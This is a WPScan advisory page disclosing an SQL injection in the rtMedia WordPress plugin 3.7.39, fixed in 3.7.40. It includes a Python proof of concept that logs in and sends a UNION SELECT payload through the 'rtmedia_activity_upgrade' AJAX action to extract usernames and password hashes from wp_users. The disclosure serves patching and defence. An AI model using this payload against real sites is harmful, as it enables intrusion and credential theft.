rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection



Description
When initialized, the rtMedia will include and instantiate certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php,’ line 110, if the class ‘BuddyPress’ is available.

Once instantiated, the RTMediaActivityUpgrade class adds an AJAX method called ‘rtmedia_activity_upgrade’. This AJAX method is callable by any registered user, and is susceptible to MySQL Injection.
Proof of Concept
import requests,json
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
	"log":"test",
	"pwd":"test",
	"wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
	"action":"rtmedia_activity_upgrade",
	"last_id":"0 AND 1=0 GROUP BY id UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(concat_ws(char(58),wp_users.user_login,wp_users.user_pass)) from wp_users group by 1=1),13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--"
}
r = s.post(url, data=payload)

print json.loads(r.text)['activity_id']

Affects Plugin

fixed in version 3.7.40

References

URL https://research.g0blin.co.uk/g0blin-00046/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 702
Verified No
WPVDB ID 7950

Timeline

Publicly Published 2015-04-28 (over 3 years ago)
Added 2015-04-28 (over 3 years ago)
Last Updated 2015-05-15 (over 3 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.